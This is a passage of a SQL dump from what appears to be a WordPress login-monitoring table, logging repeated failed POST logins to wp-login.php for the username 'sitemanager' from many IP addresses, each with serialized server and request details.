zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36110\";s:11:\"REMOTE_ADDR\";s:13:\"185.88.178.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745514793.564178;s:12:\"REQUEST_TIME\";i:1745514793;}}','185.88.178.89',0,'2025-04-24 22:43:15','1970-01-01 00:00:00'),(94159,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36520\";s:11:\"REMOTE_ADDR\";s:11:\"195.7.5.237\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745515187.3804059;s:12:\"REQUEST_TIME\";i:1745515187;}}','195.7.5.237',0,'2025-04-24 22:49:49','1970-01-01 00:00:00'),(94160,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43522\";s:11:\"REMOTE_ADDR\";s:14:\"164.92.175.159\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745515582.190213;s:12:\"REQUEST_TIME\";i:1745515582;}}','164.92.175.159',0,'2025-04-24 22:56:23','1970-01-01 00:00:00'),(94161,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35264\";s:11:\"REMOTE_ADDR\";s:12:\"185.79.157.9\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745515983.0995619;s:12:\"REQUEST_TIME\";i:1745515983;}}','185.79.157.9',0,'2025-04-24 23:03:05','1970-01-01 00:00:00'),(94162,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57000\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745516371.185406;s:12:\"REQUEST_TIME\";i:1745516371;}}','198.54.114.29',0,'2025-04-24 23:09:32','1970-01-01 00:00:00'),(94163,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42678\";s:11:\"REMOTE_ADDR\";s:10:\"38.57.3.35\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745516766.933569;s:12:\"REQUEST_TIME\";i:1745516766;}}','38.57.3.35',0,'2025-04-24 23:16:08','1970-01-01 00:00:00'),(94164,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37764\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.215.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745517157.3836589;s:12:\"REQUEST_TIME\";i:1745517157;}}','162.0.215.190',0,'2025-04-24 23:22:39','1970-01-01 00:00:00'),(94165,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55838\";s:11:\"REMOTE_ADDR\";s:13:\"103.72.97.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745517548.040354;s:12:\"REQUEST_TIME\";i:1745517548;}}','103.72.97.210',0,'2025-04-24 23:29:09','1970-01-01 00:00:00'),(94166,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58408\";s:11:\"REMOTE_ADDR\";s:15:\"103.169.160.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745517941.1513021;s:12:\"REQUEST_TIME\";i:1745517941;}}','103.169.160.163',0,'2025-04-24 23:35:42','1970-01-01 00:00:00'),(94167,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40768\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.215.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745518331.453922;s:12:\"REQUEST_TIME\";i:1745518331;}}','162.0.215.190',0,'2025-04-24 23:42:13','1970-01-01 00:00:00'),(94168,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57926\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.61.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745518724.78246;s:12:\"REQUEST_TIME\";i:1745518724;}}','94.23.61.165',0,'2025-04-24 23:48:46','1970-01-01 